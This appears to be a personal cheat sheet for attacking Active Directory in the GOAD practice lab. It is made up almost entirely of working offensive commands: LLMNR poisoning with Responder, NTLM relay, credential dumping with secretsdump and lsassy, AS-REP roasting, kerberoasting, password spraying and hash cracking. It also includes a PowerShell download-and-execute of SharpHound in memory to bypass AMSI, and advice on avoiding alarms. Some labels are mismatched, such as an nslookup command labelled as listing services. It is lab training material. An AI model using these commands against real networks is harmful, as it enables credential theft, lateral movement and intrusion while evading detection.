Mindmap
- https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg
Useful Commands
- List all linux services:
nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10 - Clock sync for Kerberos:
sudo ntpdate [DC_IP] - Password Databases:
https://www.weakpass.com/, https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm, https://github.com/berzerk0/Probable-Wordlists
Enumeration (Without Users or Credentials)
- Network scanning
- via Nmap:
nmap -Pn -p- -sC -sV -oA [Output_Filename] [IP_Range] - via SMB:
crackmapexec smb 192.168.56.1/24
- via Nmap:
- Enumerate Domain Controllers
- DNS SRV Scan:
nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
- DNS SRV Scan:
Enumeration (Using Poisoning or Relay)
- Poisoning
- Responder:
responder -I eth0 - Crack hashes:
hashcat -m 5600 --force -a 0 responder.hashes /usr/share/wordlists/rockyou.txt
- Responder:
- Relay
- Search for SMB Signing:
cme smb 192.168.56.10-23 --gen-relay-list relay.txt - NTLM Relay with Responder:
ntlmrelayx -tf smb_targets.txt -of netntlm -smb2support -socks; sudo responder -I eth0- ntlmrelayx:
socks - Administrator privileges (proxychains, port 1080):
- secretsdump:
proxychains secretsdump -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'- may require reinstalling impacket via python pip. Retrieves: Local SAM hashes, LSA cache, computer account(s) - lsassy:
proxychains lsassy --no-pass -d NORTH -u EDDARD.STARK 192.168.56.22 - donpapi:
proxychains DonPAPI -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' - smbclient:
proxychains smbclient.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug - Code execution via smbexec (SMB) or atexec (Task Scheduler)
proxychains smbexec.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug
- secretsdump:
- ntlmrelayx:
- Search for SMB Signing:
- βPrefer IPv6 over IPv4β DNS poisoning + relay (windows default)
- mitm6 + wpad to poison DNS + ntlmrelayx and relay to ldap/smb server
Enumeration (Without Users or Credentials) - With Anonymous Sessions
- Users:
crackmapexec smb 192.168.56.11 --users - Password Policy:
crackmapexec smb 192.168.56.11 --pass-pol - Everything:
enum4linux 192.168.56.11 - RPCClient direct enumeration:
rpcclient -U "NORTH\\" 192.168.56.11 -Nenumdomusersenumdomgroups
- Samba direct enumeration:
net rpc group members 'Domain Users' -W 'NORTH' -I '192.168.56.11' -U '%'
Enumeration (Without Users or Credentials) - Without Anonymous Sessions
- Bruteforce:
- Generate User List
- Nmap Kerberos (krb5-enum-users):
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 192.168.56.10- Note: badpwdcount is not increased. Verify with
crackmapexec smb -u [user] -p [password] -d [domain] 192.168.56.11 --users
- Note: badpwdcount is not increased. Verify with
- Guest Access on Shares
- CME:
crackmapexec smb 192.168.56.10-23 -u 'a' -p '' --shares
- CME:
Enumeration (With Users but no Credentials)
- ASREP Roasting
- Use valid user list (from previous enum)
- Obtain hashes from users with no PREAUTH:
GetNPUsers.py north.sevenkingdoms.local/ -no-pass -usersfile users.txtUser rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
- Cracking hash via hashcat:
hashcat -m 18200 asrephash /usr/share/wordlists/rockyou.txt
- Password Spray (Careful about locking accounts)
- User=Password test:
crackmapexec smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce - Sprayhound:
sprayhound -U users.txt -d north.sevenkingdoms.local -dc 192.168.56.11 --lowersprayhound -U users.txt -d north.sevenkingdoms.local -dc 192.168.56.11 -lu hodor -lp hodor --lower -t 2(Reduce number of tries)- View badpwdcount:
cme smb -u samwell.tarly -p Heartsbane -d north.sevenkingdoms.local 192.168.56.11 --users
- User=Password test:
Enumeration (With User and Credentials)
- Full list of users:
GetADUsers.py -all [domain]/[users]:[password]- Continue to password spray using new usernames
- Perform LDAP queries: https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap
- Graphical interface: Apache Directory Studio
- Initial query:
ldapsearch -H ldap://[IP] -D "[user[@[domain]" -w [password] -b [command] - Distinguished Name:
'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" |grep 'distinguishedName:'- Retrieve multiple rows:
... | grep -i -e 'distinguishedName:' -e 'badPwdCount:'
- Retrieve multiple rows:
- Query other trusted domains:
... -b ',DC=essos,DC=local' "(&(objectCategory=person)(objectClass=user))"AND-b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))"
- Kerberoasting (Attack services with ServicePrincipalName set and no preauth checks)
- Retrieve hashes via impacket:
GetUserSPNs.py -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes - Retrieve hashes via CME:
cme ldap 192.168.56.11 -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting KERBEROASTING - Cracking hashes via Hashcat:
hashcat -m 13100 --force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt --force
- Retrieve hashes via impacket:
- Enumerating Shares (authenticated)
cme smb 192.168.56.10-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --sharessmbclient -L \\192.168.56.10 -U jon.snow -W north.sevenkingdoms.local(Single Host)
- Enumerating DNS - retrieve all DNS records of Domain or Forest
- https://github.com/dirkjanm/adidnsdump (pip install)
adidnsdump -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' winterfell.north.sevenkingdoms.localβ> records.csv
- Bloodhound Path Enumeration
- Python Ingestor: https://github.com/fox-it/BloodHound.py.git (incomplete)
bloodhound.py --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local~/.local/bin/bloodhound-python --zip -c All -d [domain] -u [user] -p [password] -ns [nameserver_IP]- .net Ingestor: https://github.com/BloodHoundAD/SharpHound
- RDP connection to service:
xfreerdp /u:jon.snow /p:iknownothing /d:north /v:192.168.56.22 /cert-ignore+ In memory SharpHound (bypass AMSI)$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.1/SharpHound.exe') $assem = [System.Reflection.Assembly]::Load($data) [Sharphound.Program]::Main("-d north.sevenkingdoms.local -c all".Split())
- Bloodhound Hunting
- Install:
sudo apt-get install bloodhound; sudo neo4j start; bloodhound - Default Password:
neo4j:neo4j - neo4j commands
- Domains + Computers:
MATCH p = (d:Domain)-[r:Contains*1..]->(n:Computer) RETURN p - Users:
MATCH p = (d:Domain)-[r:Contains*1..]->(n:User) RETURN p - Groups:
MATCH q=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN q - ACL:
MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true and not tolower(u.name) contains 'vagrant' RETURN p
- Domains + Computers:
- Other Resources: https://en.hackndo.com/bloodhound/, https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/, https://github.com/hausec/Bloodhound-Custom-Queries
- Install:
Kerberos Setup (On Linux)
- Update
/etc/hosts192.168.56.10 sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding 192.168.56.11 winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell 192.168.56.12 essos.local meereen.essos.local meereen 192.168.56.22 castelblack.north.sevenkingdoms.local castelblack 192.168.56.23 braavos.essos.local braavos - Install Kerberos client:
sudo apt install krb5-user - Setup
/etc/krb5configuration file: https://mayfly277.github.io/posts/GOADv2-pwning_part1/ - Reconfigure:
sudo dpkg-reconfigure krb5-config
Kerberos Tickets
- Retrieve:
getTGT.py essos.local/khal.drogo:horse - Export:
export KRB5CCNAME=/workspace/[DC_User].ccache - Use:
smbclient.py -k @[Machine_IP_Domain]
Domains, Forests, and Trusts
Users
- Leveraging User Secrets: LM, NT Hashes and Kerberos Tickets
secretsdump.py 'contoso.local/Administrator@192.168.100.2' -just-dc-user anakin- Use AES256-CTS-HMAC-SHA1-96 to avoid alarms.
Get-ADUser -Identity "username" -Properties UserAccountControl- Determine the UserAccountControl attribute